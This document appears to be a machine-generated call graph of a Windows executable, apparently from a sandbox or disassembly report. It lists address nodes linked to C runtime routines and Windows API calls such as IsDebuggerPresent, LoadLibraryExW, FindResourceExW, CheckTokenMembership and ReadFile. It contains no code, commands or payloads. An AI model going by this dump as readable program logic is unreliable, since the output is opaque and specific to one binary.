98046->98044 98076 b032f5 58 API calls 3 library calls 98046->98076 98049->97964 98050->97963 98051->97956 98053 b09edf __close 98052->98053 98054 b09f00 98053->98054 98055 b09ee8 98053->98055 98064 b09f21 __close 98054->98064 98080 b08a5d 58 API calls __malloc_crt 98054->98080 98077 b0a3ab 58 API calls 2 library calls 98055->98077 98057 b09eed 98078 b0a408 58 API calls 8 library calls 98057->98078 98060 b09f15 98062 b09f2b 98060->98062 98063 b09f1c 98060->98063 98061 b09ef4 98079 b032df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98061->98079 98067 b09e4b __lock 58 API calls 98062->98067 98081 b08d68 58 API calls __getptd_noexit 98063->98081 98064->98046 98068 b09f32 98067->98068 98070 b09f57 98068->98070 98071 b09f3f 98068->98071 98083 b02f95 98070->98083 98082 b0a06b InitializeCriticalSectionAndSpinCount 98071->98082 98074 b09f4b 98089 b09f73 LeaveCriticalSection _doexit 98074->98089 98077->98057 98078->98061 98080->98060 98081->98064 98082->98074 98084 b02f9e RtlFreeHeap 98083->98084 98088 b02fc7 _free 98083->98088 98085 b02fb3 98084->98085 98084->98088 98090 b08d68 58 API calls __getptd_noexit 98085->98090 98087 b02fb9 GetLastError 98087->98088 98088->98074 98089->98064 98090->98087 98091->97972 98092->97975 98093->97988 98095 b09011 98094->98095 98100 b08e99 98095->98100 98099 b0902c 98099->97991 98101 b08eb3 _memset __call_reportfault 98100->98101 98102 b08ed3 IsDebuggerPresent 98101->98102 98108 b0a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98102->98108 98105 b08fba 98107 b0a380 GetCurrentProcess TerminateProcess 98105->98107 98106 b08f97 __call_reportfault 98109 b0c836 98106->98109 98107->98099 98108->98106 98110 b0c840 IsProcessorFeaturePresent 98109->98110 98111 b0c83e 98109->98111 98113 b15b5a 98110->98113 98111->98105 98116 b15b09 5 API calls 2 library calls 98113->98116 98115 b15c3d 98115->98105 98116->98115 98118 b0a714 EncodePointer 98117->98118 98118->98118 98119 b0a72e 98118->98119 98119->97995 98123 b02e84 98120->98123 98122 b02f8b 98122->97997 98124 b02e90 __close 98123->98124 98131 b03457 98124->98131 98130 b02eb7 __close 98130->98122 98132 b09e4b __lock 58 API calls 98131->98132 98133 b02e99 98132->98133 98134 b02ec8 DecodePointer DecodePointer 98133->98134 98135 b02ef5 98134->98135 98136 b02ea5 98134->98136 98135->98136 98148 b089e4 59 API calls __close 98135->98148 98145 b02ec2 98136->98145 98138 b02f58 EncodePointer EncodePointer 98138->98136 98139 b02f2c 98139->98136 98143 b02f46 EncodePointer 98139->98143 98150 b08aa4 61 API calls 2 library calls 98139->98150 98140 b02f07 98140->98138 98140->98139 98149 b08aa4 61 API calls 2 library calls 98140->98149 98143->98138 98144 b02f40 98144->98136 98144->98143 98151 b03460 98145->98151 98148->98140 98149->98139 98150->98144 98154 b09fb5 LeaveCriticalSection 98151->98154 98153 b02ec7 98153->98130 98154->98153 98156 b09e4b __lock 58 API calls 98155->98156 98157 b035b7 DecodePointer EncodePointer 98156->98157 98220 b09fb5 LeaveCriticalSection 98157->98220 98159 ae49a7 98160 b03614 98159->98160 98161 b03638 98160->98161 98162 b0361e 98160->98162 98161->98005 98162->98161 98221 b08d68 58 API calls __getptd_noexit 98162->98221 98164 b03628 98222 b08ff6 9 API calls __close 98164->98222 98166 b03633 98166->98005 98167->98007 98169 ae3b59 __ftell_nolock 98168->98169 98223 ae77c7 98169->98223 98173 ae3b8c IsDebuggerPresent 98174 ae3b9a 98173->98174 98175 b1d4ad MessageBoxA 98173->98175 98176 b1d4c7 98174->98176 98177 ae3bb7 98174->98177 98210 ae3c73 98174->98210 98175->98176 98447 ae7373 59 API calls Mailbox 98176->98447 98309 ae73e5 98177->98309 98178 ae3c7a SetCurrentDirectoryW 98181 ae3c87 Mailbox 98178->98181 98181->98009 98182 b1d4d7 98187 b1d4ed SetCurrentDirectoryW 98182->98187 98184 ae3bd5 GetFullPathNameW 98325 ae7d2c 98184->98325 98186 ae3c10 98334 af0a8d 98186->98334 98187->98181 98190 ae3c2e 98191 ae3c38 98190->98191 98448 b44c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98190->98448 98194 b1d50a 98194->98191 98210->98178 98220->98159 98221->98164 98222->98166 98476 b00ff6 98223->98476 98225 ae77e8 98226 b00ff6 Mailbox 59 API calls 98225->98226 98227 ae3b63 GetCurrentDirectoryW 98226->98227 98228 ae3778 98227->98228 98229 ae77c7 59 API calls 98228->98229 98230 ae378e 98229->98230 98514 ae3d43 98230->98514 98232 ae37ac 98233 ae4864 61 API calls 98232->98233 98234 ae37c0 98233->98234 98235 ae7f41 59 API calls 98234->98235 98236 ae37cd 98235->98236 98528 ae4f3d 98236->98528 98239 ae37ee Mailbox 98552 ae81a7 98239->98552 98240 b1d3ae 98599 b497e5 98240->98599 98243 b1d3cd 98246 b02f95 _free 58 API calls 98243->98246 98248 b1d3da 98246->98248 98250 ae4faa 84 API calls 98248->98250 98252 b1d3e3 98250->98252 98256 ae3ee2 59 API calls 98252->98256 98253 ae7f41 59 API calls 98254 ae381a 98253->98254 98559 ae8620 98254->98559 98258 b1d3fe 98256->98258 98257 ae382c Mailbox 98259 ae7f41 59 API calls 98257->98259 98260 ae3ee2 59 API calls 98258->98260 98261 ae3852 98259->98261 98262 b1d41a 98260->98262 98263 ae8620 69 API calls 98261->98263 98264 ae4864 61 API calls 98262->98264 98266 ae3861 Mailbox 98263->98266 98265 b1d43f 98264->98265 98267 ae3ee2 59 API calls 98265->98267 98269 ae77c7 59 API calls 98266->98269 98268 b1d44b 98267->98268 98270 ae81a7 59 API calls 98268->98270 98271 ae387f 98269->98271 98272 b1d459 98270->98272 98563 ae3ee2 98271->98563 98274 ae3ee2 59 API calls 98272->98274 98277 b1d468 98274->98277 98282 ae81a7 59 API calls 98277->98282 98278 ae3899 98278->98252 98279 ae38a3 98278->98279 98280 b0313d _W_store_winword 60 API calls 98279->98280 98281 ae38ae 98280->98281 98281->98258 98283 ae38b8 98281->98283 98284 b1d48a 98282->98284 98285 b0313d _W_store_winword 60 API calls 98283->98285 98286 ae3ee2 59 API calls 98284->98286 98287 ae38c3 98285->98287 98288 b1d497 98286->98288 98287->98262 98289 ae38cd 98287->98289 98288->98288 98290 b0313d _W_store_winword 60 API calls 98289->98290 98291 ae38d8 98290->98291 98291->98277 98292 ae3919 98291->98292 98294 ae3ee2 59 API calls 98291->98294 98292->98277 98293 ae3926 98292->98293 98579 ae942e 98293->98579 98296 ae38fc 98294->98296 98298 ae81a7 59 API calls 98296->98298 98299 ae390a 98298->98299 98301 ae3ee2 59 API calls 98299->98301 98301->98292 98304 ae93ea 59 API calls 98306 ae3961 98304->98306 98305 ae9040 60 API calls 98305->98306 98306->98304 98306->98305 98307 ae3ee2 59 API calls 98306->98307 98308 ae39a7 Mailbox 98306->98308 98307->98306 98308->98173 98310 ae73f2 __ftell_nolock 98309->98310 98311 ae740b 98310->98311 98312 b1ee4b _memset 98310->98312 99399 ae48ae 98311->99399 98315 b1ee67 GetOpenFileNameW 98312->98315 98317 b1eeb6 98315->98317 98318 ae7d2c 59 API calls 98317->98318 98320 b1eecb 98318->98320 98320->98320 98322 ae7429 99427 ae69ca 98322->99427 98326 ae7d38 __wsetenvp 98325->98326 98327 ae7da5 98325->98327 98329 ae7d4e 98326->98329 98330 ae7d73 98326->98330 98328 ae7e8c 59 API calls 98327->98328 98333 ae7d56 _memmove 98328->98333 99750 ae8087 59 API calls Mailbox 98329->99750 98332 ae8189 59 API calls 98330->98332 98332->98333 98333->98186 98335 af0a9a __ftell_nolock 98334->98335 99751 ae6ee0 98335->99751 98337 af0a9f 98338 ae3c26 98337->98338 99762 af12fe 89 API calls 98337->99762 98338->98182 98338->98190 98340 af0aac 98340->98338 99763 af4047 91 API calls Mailbox 98340->99763 98342 af0ab5 98342->98338 98447->98182 98448->98194 98480 b00ffe 98476->98480 98478 b01018 98478->98225 98480->98478 98481 b0101c std::exception::exception 98480->98481 98486 b0594c 98480->98486 98503 b035e1 DecodePointer 98480->98503 98504 b087db RaiseException 98481->98504 98483 b01046 98505 b08711 58 API calls _free 98483->98505 98485 b01058 98485->98225 98487 b059c7 98486->98487 98500 b05958 98486->98500 98512 b035e1 DecodePointer 98487->98512 98489 b05963 98489->98500 98506 b0a3ab 58 API calls 2 library calls 98489->98506 98507 b0a408 58 API calls 8 library calls 98489->98507 98508 b032df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98489->98508 98490 b059cd 98513 b08d68 58 API calls __getptd_noexit 98490->98513 98493 b0598b RtlAllocateHeap 98495 b059bf 98493->98495 98493->98500 98495->98480 98496 b059b3 98510 b08d68 58 API calls __getptd_noexit 98496->98510 98500->98489 98500->98493 98500->98496 98501 b059b1 98500->98501 98509 b035e1 DecodePointer 98500->98509 98511 b08d68 58 API calls __getptd_noexit 98501->98511 98503->98480 98504->98483 98505->98485 98506->98489 98507->98489 98509->98500 98510->98501 98511->98495 98512->98490 98513->98495 98515 ae3d50 __ftell_nolock 98514->98515 98516 ae7d2c 59 API calls 98515->98516 98520 ae3eb6 Mailbox 98515->98520 98518 ae3d82 98516->98518 98527 ae3db8 Mailbox 98518->98527 98640 ae7b52 98518->98640 98519 ae3e89 98519->98520 98521 ae7f41 59 API calls 98519->98521 98520->98232 98523 ae3eaa 98521->98523 98522 ae7f41 59 API calls 98522->98527 98525 ae3f84 59 API calls 98523->98525 98524 ae7b52 59 API calls 98524->98527 98525->98520 98527->98519 98527->98520 98527->98522 98527->98524 98643 ae3f84 98527->98643 98653 ae4d13 98528->98653 98533 ae4f68 LoadLibraryExW 98663 ae4cc8 98533->98663 98534 b1dd0f 98535 ae4faa 84 API calls 98534->98535 98537 b1dd16 98535->98537 98539 ae4cc8 3 API calls 98537->98539 98541 b1dd1e 98539->98541 98689 ae506b 98541->98689 98542 ae4f8f 98542->98541 98543 ae4f9b 98542->98543 98545 ae4faa 84 API calls 98543->98545 98546 ae37e6 98545->98546 98546->98239 98546->98240 98549 b1dd45 98697 ae5027 98549->98697 98551 b1dd52 98553 ae3801 98552->98553 98554 ae81b2 98552->98554 98556 ae93ea 98553->98556 99127 ae80d7 59 API calls 2 library calls 98554->99127 98557 b00ff6 Mailbox 59 API calls 98556->98557 98558 ae380d 98557->98558 98558->98253 98560 ae862b 98559->98560 98561 ae8652 98560->98561 99128 ae8b13 69 API calls Mailbox 98560->99128 98561->98257 98564 ae3eec 98563->98564 98565 ae3f05 98563->98565 98566 ae81a7 59 API calls 98564->98566 98567 ae7d2c 59 API calls 98565->98567 98568 ae388b 98566->98568 98567->98568 98569 b0313d 98568->98569 98570 b03149 98569->98570 98571 b031be 98569->98571 98578 b0316e 98570->98578 99129 b08d68 58 API calls __getptd_noexit 98570->99129 99131 b031d0 60 API calls 3 library calls 98571->99131 98574 b031cb 98574->98278 98575 b03155 99130 b08ff6 9 API calls __close 98575->99130 98577 b03160 98577->98278 98578->98278 98580 ae9436 98579->98580 98581 b00ff6 Mailbox 59 API calls 98580->98581 98582 ae9444 98581->98582 98583 ae3936 98582->98583 99132 ae935c 59 API calls Mailbox 98582->99132 98585 ae91b0 98583->98585 99133 ae92c0 98585->99133 98587 b00ff6 Mailbox 59 API calls 98589 ae3944 98587->98589 98588 ae91bf 98588->98587 98588->98589 98590 ae9040 98589->98590 98591 b1f5a5 98590->98591 98593 ae9057 98590->98593 98591->98593 99148 ae8d3b 59 API calls Mailbox 98591->99148 98594 ae9158 98593->98594 98595 ae91a0 98593->98595 98598 ae915f 98593->98598 98597 b00ff6 Mailbox 59 API calls 98594->98597 99147 ae9e9c 60 API calls Mailbox 98595->99147 98597->98598 98598->98306 98600 ae5045 85 API calls 98599->98600 98601 b49854 98600->98601 99149 b499be 98601->99149 98604 ae506b 74 API calls 98605 b49881 98604->98605 98606 ae506b 74 API calls 98605->98606 98607 b49891 98606->98607 98608 ae506b 74 API calls 98607->98608 98609 b498ac 98608->98609 98610 ae506b 74 API calls 98609->98610 98611 b498c7 98610->98611 98612 ae5045 85 API calls 98611->98612 98613 b498de 98612->98613 98614 b0594c __malloc_crt 58 API calls 98613->98614 98615 b498e5 98614->98615 98616 b0594c __malloc_crt 58 API calls 98615->98616 98617 b498ef 98616->98617 98618 ae506b 74 API calls 98617->98618 98619 b49903 98618->98619 98620 b49393 GetSystemTimeAsFileTime 98619->98620 98621 b49916 98620->98621 98622 b49940 98621->98622 98623 b4992b 98621->98623 98625 b499a5 98622->98625 98626 b49946 98622->98626 98624 b02f95 _free 58 API calls 98623->98624 98628 b49931 98624->98628 98627 b02f95 _free 58 API calls 98625->98627 99155 b48d90 98626->99155 98632 b1d3c1 98627->98632 98630 b02f95 _free 58 API calls 98628->98630 98630->98632 98632->98243 98634 ae4faa 98632->98634 98633 b02f95 _free 58 API calls 98633->98632 98635 ae4fb4 98634->98635 98637 ae4fbb 98634->98637 98636 b055d6 __fcloseall 83 API calls 98635->98636 98636->98637 98638 ae4fca 98637->98638 98639 ae4fdb FreeLibrary 98637->98639 98638->98243 98639->98638 98649 ae7faf 98640->98649 98642 ae7b5d 98642->98518 98644 ae3f92 98643->98644 98648 ae3fb4 _memmove 98643->98648 98647 b00ff6 Mailbox 59 API calls 98644->98647 98645 b00ff6 Mailbox 59 API calls 98646 ae3fc8 98645->98646 98646->98527 98647->98648 98648->98645 98650 ae7fc2 98649->98650 98652 ae7fbf _memmove 98649->98652 98651 b00ff6 Mailbox 59 API calls 98650->98651 98651->98652 98652->98642 98702 ae4d61 98653->98702 98656 ae4d3a 98658 ae4d4a FreeLibrary 98656->98658 98659 ae4d53 98656->98659 98657 ae4d61 2 API calls 98657->98656 98658->98659 98660 b0548b 98659->98660 98706 b054a0 98660->98706 98662 ae4f5c 98662->98533 98662->98534 98864 ae4d94 98663->98864 98666 ae4cff FreeLibrary 98667 ae4d08 98666->98667 98670 ae4dd0 98667->98670 98668 ae4d94 2 API calls 98669 ae4ced 98668->98669 98669->98666 98669->98667 98671 b00ff6 Mailbox 59 API calls 98670->98671 98672 ae4de5 98671->98672 98868 ae538e 98672->98868 98674 ae4df1 _memmove 98675 ae4e2c 98674->98675 98676 ae4ee9 98674->98676 98677 ae4f21 98674->98677 98678 ae5027 69 API calls 98675->98678 98871 ae4fe9 CreateStreamOnHGlobal 98676->98871 98882 b49ba5 95 API calls 98677->98882 98681 ae4e35 98678->98681 98682 ae506b 74 API calls 98681->98682 98683 ae4ec9 98681->98683 98685 b1dcd0 98681->98685 98877 ae5045 98681->98877 98682->98681 98683->98542 98686 ae5045 85 API calls 98685->98686 98687 b1dce4 98686->98687 98688 ae506b 74 API calls 98687->98688 98688->98683 98690 ae507d 98689->98690 98691 b1ddf6 98689->98691 98906 b05812 98690->98906 98694 b49393 99104 b491e9 98694->99104 98696 b493a9 98696->98549 98698 b1ddb9 98697->98698 98699 ae5036 98697->98699 99109 b05e90 98699->99109 98701 ae503e 98701->98551 98703 ae4d2e 98702->98703 98704 ae4d6a LoadLibraryA 98702->98704 98703->98656 98703->98657 98704->98703 98705 ae4d7b GetProcAddress 98704->98705 98705->98703 98708 b054ac __close 98706->98708 98707 b054bf 98755 b08d68 58 API calls __getptd_noexit 98707->98755 98708->98707 98710 b054f0 98708->98710 98725 b10738 98710->98725 98711 b054c4 98756 b08ff6 9 API calls __close 98711->98756 98714 b054f5 98715 b0550b 98714->98715 98716 b054fe 98714->98716 98718 b05535 98715->98718 98719 b05515 98715->98719 98757 b08d68 58 API calls __getptd_noexit 98716->98757 98740 b10857 98718->98740 98758 b08d68 58 API calls __getptd_noexit 98719->98758 98721 b054cf __close @_EH4_CallFilterFunc@8 98721->98662 98726 b10744 __close 98725->98726 98727 b09e4b __lock 58 API calls 98726->98727 98738 b10752 98727->98738 98728 b107cd 98765 b08a5d 58 API calls __malloc_crt 98728->98765 98729 b107c6 98760 b1084e 98729->98760 98732 b107d4 98732->98729 98766 b0a06b InitializeCriticalSectionAndSpinCount 98732->98766 98733 b10843 __close 98733->98714 98735 b09ed3 __mtinitlocknum 58 API calls 98735->98738 98737 b107fa EnterCriticalSection 98737->98729 98738->98728 98738->98729 98738->98735 98763 b06e8d 59 API calls __lock 98738->98763 98764 b06ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98738->98764 98748 b10877 __wopenfile 98740->98748 98741 b10891 98771 b08d68 58 API calls __getptd_noexit 98741->98771 98743 b10896 98772 b08ff6 9 API calls __close 98743->98772 98745 b05540 98759 b05562 LeaveCriticalSection LeaveCriticalSection __wfsopen 98745->98759 98746 b10aaf 98768 b187f1 98746->98768 98748->98741 98754 b10a4c 98748->98754 98773 b03a0b 60 API calls 2 library calls 98748->98773 98750 b10a45 98750->98754 98774 b03a0b 60 API calls 2 library calls 98750->98774 98752 b10a64 98752->98754 98775 b03a0b 60 API calls 2 library calls 98752->98775 98754->98741 98754->98746 98755->98711 98756->98721 98757->98721 98758->98721 98759->98721 98767 b09fb5 LeaveCriticalSection 98760->98767 98762 b10855 98762->98733 98763->98738 98764->98738 98765->98732 98766->98737 98767->98762 98776 b17fd5 98768->98776 98770 b1880a 98770->98745 98771->98743 98772->98745 98773->98750 98774->98752 98775->98754 98777 b17fe1 __close 98776->98777 98778 b17ff7 98777->98778 98780 b1802d 98777->98780 98861 b08d68 58 API calls __getptd_noexit 98778->98861 98787 b1809e 98780->98787 98781 b17ffc 98862 b08ff6 9 API calls __close 98781->98862 98784 b18049 98863 b18072 LeaveCriticalSection __unlock_fhandle 98784->98863 98786 b18006 __close 98786->98770 98788 b180be 98787->98788 98789 b0471a __wsopen_nolock 58 API calls 98788->98789 98792 b180da 98789->98792 98790 b09006 __invoke_watson 8 API calls 98791 b187f0 98790->98791 98793 b17fd5 __wsopen_helper 103 API calls 98791->98793 98794 b18114 98792->98794 98801 b18137 98792->98801 98860 b18211 98792->98860 98795 b1880a 98793->98795 98796 b08d34 __close 58 API calls 98794->98796 98795->98784 98797 b18119 98796->98797 98798 b08d68 __close 58 API calls 98797->98798 98799 b18126 98798->98799 98802 b08ff6 __close 9 API calls 98799->98802 98800 b181f5 98803 b08d34 __close 58 API calls 98800->98803 98801->98800 98809 b181d3 98801->98809 98804 b18130 98802->98804 98805 b181fa 98803->98805 98804->98784 98806 b08d68 __close 58 API calls 98805->98806 98807 b18207 98806->98807 98808 b08ff6 __close 9 API calls 98807->98808 98808->98860 98810 b0d4d4 __alloc_osfhnd 61 API calls 98809->98810 98811 b182a1 98810->98811 98812 b182ab 98811->98812 98813 b182ce 98811->98813 98815 b08d34 __close 58 API calls 98812->98815 98814 b17f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98813->98814 98825 b182f0 98814->98825 98816 b182b0 98815->98816 98817 b08d68 __close 58 API calls 98816->98817 98819 b182ba 98817->98819 98818 b1836e GetFileType 98820 b18379 GetLastError 98818->98820 98821 b183bb 98818->98821 98823 b08d68 __close 58 API calls 98819->98823 98824 b08d47 __dosmaperr 58 API calls 98820->98824 98832 b0d76a __set_osfhnd 59 API calls 98821->98832 98822 b1833c GetLastError 98826 b08d47 __dosmaperr 58 API calls 98822->98826 98823->98804 98827 b183a0 CloseHandle 98824->98827 98825->98818 98825->98822 98828 b17f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98825->98828 98829 b18361 98826->98829 98827->98829 98830 b183ae 98827->98830 98831 b18331 98828->98831 98833 b08d68 __close 58 API calls 98829->98833 98834 b08d68 __close 58 API calls 98830->98834 98831->98818 98831->98822 98836 b183d9 98832->98836 98833->98860 98835 b183b3 98834->98835 98835->98829 98837 b18594 98836->98837 98838 b11b11 __lseeki64_nolock 60 API calls 98836->98838 98856 b1845a 98836->98856 98839 b18767 CloseHandle 98837->98839 98837->98860 98840 b18443 98838->98840 98841 b17f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98839->98841 98843 b08d34 __close 58 API calls 98840->98843 98840->98856 98842 b1878e 98841->98842 98845 b18796 GetLastError 98842->98845 98846 b187c2 98842->98846 98843->98856 98844 b110ab 70 API calls __read_nolock 98844->98856 98847 b08d47 __dosmaperr 58 API calls 98845->98847 98846->98860 98849 b187a2 98847->98849 98848 b1848c 98851 b199f2 __chsize_nolock 82 API calls 98848->98851 98848->98856 98852 b0d67d __free_osfhnd 59 API calls 98849->98852 98850 b10d2d __close_nolock 61 API calls 98850->98856 98851->98848 98852->98846 98853 b0dac6 __write 78 API calls 98853->98856 98854 b18611 98855 b10d2d __close_nolock 61 API calls 98854->98855 98857 b18618 98855->98857 98856->98837 98856->98844 98856->98848 98856->98850 98856->98853 98856->98854 98858 b11b11 60 API calls __lseeki64_nolock 98856->98858 98859 b08d68 __close 58 API calls 98857->98859 98858->98856 98859->98860 98860->98790 98861->98781 98862->98786 98863->98786 98865 ae4ce1 98864->98865 98866 ae4d9d LoadLibraryA 98864->98866 98865->98668 98865->98669 98866->98865 98867 ae4dae GetProcAddress 98866->98867 98867->98865 98869 b00ff6 Mailbox 59 API calls 98868->98869 98870 ae53a0 98869->98870 98870->98674 98872 ae5003 FindResourceExW 98871->98872 98876 ae5020 98871->98876 98873 b1dd5c LoadResource 98872->98873 98872->98876 98874 b1dd71 SizeofResource 98873->98874 98873->98876 98875 b1dd85 LockResource 98874->98875 98874->98876 98875->98876 98876->98675 98878 b1ddd4 98877->98878 98879 ae5054 98877->98879 98883 b05a7d 98879->98883 98881 ae5062 98881->98681 98882->98675 98884 b05a89 __close 98883->98884 98885 b05a9b 98884->98885 98886 b05ac1 98884->98886 98896 b08d68 58 API calls __getptd_noexit 98885->98896 98898 b06e4e 98886->98898 98889 b05aa0 98897 b08ff6 9 API calls __close 98889->98897 98890 b05ac7 98904 b059ee 83 API calls 5 library calls 98890->98904 98893 b05ad6 98905 b05af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 98893->98905 98895 b05aab __close 98895->98881 98896->98889 98897->98895 98899 b06e80 EnterCriticalSection 98898->98899 98900 b06e5e 98898->98900 98901 b06e76 98899->98901 98900->98899 98902 b06e66 98900->98902 98901->98890 98903 b09e4b __lock 58 API calls 98902->98903 98903->98901 98904->98893 98905->98895 98909 b0582d 98906->98909 98908 ae508e 98908->98694 98910 b05839 __close 98909->98910 98911 b0587c 98910->98911 98912 b05874 __close 98910->98912 98917 b0584f _memset 98910->98917 98913 b06e4e __lock_file 59 API calls 98911->98913 98912->98908 98914 b05882 98913->98914 98922 b0564d 98914->98922 98936 b08d68 58 API calls __getptd_noexit 98917->98936 98918 b05869 98937 b08ff6 9 API calls __close 98918->98937 98925 b05668 _memset 98922->98925 98928 b05683 98922->98928 98923 b05673 99034 b08d68 58 API calls __getptd_noexit 98923->99034 98925->98923 98925->98928 98933 b056c3 98925->98933 98938 b058b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98928->98938 98929 b057d4 _memset 99037 b08d68 58 API calls __getptd_noexit 98929->99037 98933->98928 98933->98929 98939 b04916 98933->98939 98946 b110ab 98933->98946 99014 b10df7 98933->99014 99036 b10f18 58 API calls 3 library calls 98933->99036 98934 b05678 99035 b08ff6 9 API calls __close 98934->99035 98936->98918 98937->98912 98938->98912 98940 b04920 98939->98940 98941 b04935 98939->98941 99038 b08d68 58 API calls __getptd_noexit 98940->99038 98941->98933 98943 b04925 99039 b08ff6 9 API calls __close 98943->99039 98945 b04930 98945->98933 98947 b110e3 98946->98947 98948 b110cc 98946->98948 98950 b1181b 98947->98950 98954 b1111d 98947->98954 99049 b08d34 58 API calls __getptd_noexit 98948->99049 99065 b08d34 58 API calls __getptd_noexit 98950->99065 98951 b110d1 99050 b08d68 58 API calls __getptd_noexit 98951->99050 98956 b11125 98954->98956 98963 b1113c 98954->98963 98955 b11820 99066 b08d68 58 API calls __getptd_noexit 98955->99066 99051 b08d34 58 API calls __getptd_noexit 98956->99051 98958 b11131 99067 b08ff6 9 API calls __close 98958->99067 98960 b1112a 99052 b08d68 58 API calls __getptd_noexit 98960->99052 98962 b11151 99053 b08d34 58 API calls __getptd_noexit 98962->99053 98963->98962 98965 b1116b 98963->98965 98967 b11189 98963->98967 98994 b110d8 98963->98994 98965->98962 98971 b11176 98965->98971 99054 b08a5d 58 API calls __malloc_crt 98967->99054 98969 b11199 98972 b111a1 98969->98972 98973 b111bc 98969->98973 99040 b15ebb 98971->99040 99055 b08d68 58 API calls __getptd_noexit 98972->99055 99057 b11b11 60 API calls 3 library calls 98973->99057 98974 b1128a 98976 b11303 ReadFile 98974->98976 98981 b112a0 GetConsoleMode 98974->98981 98979 b117e3 GetLastError 98976->98979 98980 b11325 98976->98980 98978 b111a6 99056 b08d34 58 API calls __getptd_noexit 98978->99056 98983 b117f0 98979->98983 98984 b112e3 98979->98984 98980->98979 98988 b112f5 98980->98988 98985 b11300 98981->98985 98986 b112b4 98981->98986 99063 b08d68 58 API calls __getptd_noexit 98983->99063 98996 b112e9 98984->98996 99058 b08d47 58 API calls 2 library calls 98984->99058 98985->98976 98986->98985 98989 b112ba ReadConsoleW 98986->98989 98988->98996 98997 b1135a 98988->98997 99006 b115c7 98988->99006 98989->98988 98991 b112dd GetLastError 98989->98991 98990 b117f5 99064 b08d34 58 API calls __getptd_noexit 98990->99064 98991->98984 98994->98933 98995 b02f95 _free 58 API calls 98995->98994 98996->98994 98996->98995 98998 b113c6 ReadFile 98997->98998 99004 b11447 98997->99004 99000 b113e7 GetLastError 98998->99000 99012 b113f1 98998->99012 99000->99012 99001 b11504 99009 b114b4 MultiByteToWideChar 99001->99009 99061 b11b11 60 API calls 3 library calls 99001->99061 99002 b114f4 99060 b08d68 58 API calls __getptd_noexit 99002->99060 99003 b116cd ReadFile 99007 b116f0 GetLastError 99003->99007 99013 b116fe 99003->99013 99004->98996 99004->99001 99004->99002 99004->99009 99006->98996 99006->99003 99007->99013 99009->98991 99009->98996 99012->98997 99059 b11b11 60 API calls 3 library calls 99012->99059 99013->99006 99062 b11b11 60 API calls 3 library calls 99013->99062 99015 b10e02 99014->99015 99018 b10e17 99014->99018 99101 b08d68 58 API calls __getptd_noexit 99015->99101 99017 b10e07 99102 b08ff6 9 API calls __close 99017->99102 99021 b10e4c 99018->99021 99028 b10e12 99018->99028 99103 b16234 58 API calls __malloc_crt 99018->99103 99022 b04916 __filbuf 58 API calls 99021->99022 99023 b10e60 99022->99023 99068 b10f97 99023->99068 99025 b10e67 99026 b04916 __filbuf 58 API calls 99025->99026 99025->99028 99027 b10e8a 99026->99027 99027->99028 99029 b04916 __filbuf 58 API calls 99027->99029 99028->98933 99030 b10e96 99029->99030 99030->99028 99031 b04916 __filbuf 58 API calls 99030->99031 99032 b10ea3 99031->99032 99033 b04916 __filbuf 58 API calls 99032->99033 99033->99028 99034->98934 99035->98928 99036->98933 99037->98934 99038->98943 99039->98945 99041 b15ed3 99040->99041 99042 b15ec6 99040->99042 99044 b15edf 99041->99044 99045 b08d68 __close 58 API calls 99041->99045 99043 b08d68 __close 58 API calls 99042->99043 99046 b15ecb 99043->99046 99044->98974 99047 b15f00 99045->99047 99046->98974 99048 b08ff6 __close 9 API calls 99047->99048 99048->99046 99049->98951 99050->98994 99051->98960 99052->98958 99053->98960 99054->98969 99055->98978 99056->98994 99057->98971 99058->98996 99059->99012 99060->98996 99061->99009 99062->99013 99063->98990 99064->98996 99065->98955 99066->98958 99067->98994 99069 b10fa3 __close 99068->99069 99070 b10fb0 99069->99070 99071 b10fc7 99069->99071 99072 b08d34 __close 58 API calls 99070->99072 99073 b1108b 99071->99073 99076 b10fdb 99071->99076 99075 b10fb5 99072->99075 99074 b08d34 __close 58 API calls 99073->99074 99077 b10ffe 99074->99077 99078 b08d68 __close 58 API calls 99075->99078 99079 b11006 99076->99079 99080 b10ff9 99076->99080 99086 b08d68 __close 58 API calls 99077->99086 99089 b10fbc __close 99078->99089 99081 b11013 99079->99081 99082 b11028 99079->99082 99083 b08d34 __close 58 API calls 99080->99083 99084 b08d34 __close 58 API calls 99081->99084 99085 b0d446 ___lock_fhandle 59 API calls 99082->99085 99083->99077 99087 b11018 99084->99087 99088 b1102e 99085->99088 99093 b11020 99086->99093 99090 b08d68 __close 58 API calls 99087->99090 99091 b11041 99088->99091 99092 b11054 99088->99092 99089->99025 99090->99093 99094 b110ab __read_nolock 70 API calls 99091->99094 99096 b08d68 __close 58 API calls 99092->99096 99095 b08ff6 __close 9 API calls 99093->99095 99097 b1104d 99094->99097 99095->99089 99098 b11059 99096->99098 99100 b11083 __read LeaveCriticalSection 99097->99100 99099 b08d34 __close 58 API calls 99098->99099 99099->99097 99100->99089 99101->99017 99102->99028 99103->99021 99107 b0543a GetSystemTimeAsFileTime 99104->99107 99106 b491f8 99106->98696 99108 b05468 __aulldiv 99107->99108 99108->99106 99110 b05e9c __close 99109->99110 99111 b05ec3 99110->99111 99112 b05eae 99110->99112 99114 b06e4e __lock_file 59 API calls 99111->99114 99123 b08d68 58 API calls __getptd_noexit 99112->99123 99116 b05ec9 99114->99116 99115 b05eb3 99124 b08ff6 9 API calls __close 99115->99124 99125 b05b00 67 API calls 6 library calls 99116->99125 99119 b05ed4 99126 b05ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99119->99126 99121 b05ee6 99122 b05ebe __close 99121->99122 99122->98701 99123->99115 99124->99122 99125->99119 99126->99121 99127->98553 99128->98561 99129->98575 99130->98577 99131->98574 99132->98583 99134 ae92c9 Mailbox 99133->99134 99135 b1f5c8 99134->99135 99140 ae92d3 99134->99140 99136 b00ff6 Mailbox 59 API calls 99135->99136 99138 b1f5d4 99136->99138 99137 ae92da 99137->98588 99140->99137 99141 ae9df0 99140->99141 99143 ae9dfb 99141->99143 99142 ae9e32 99142->99140 99143->99142 99146 ae8e34 59 API calls Mailbox 99143->99146 99145 ae9e5d 99145->99140 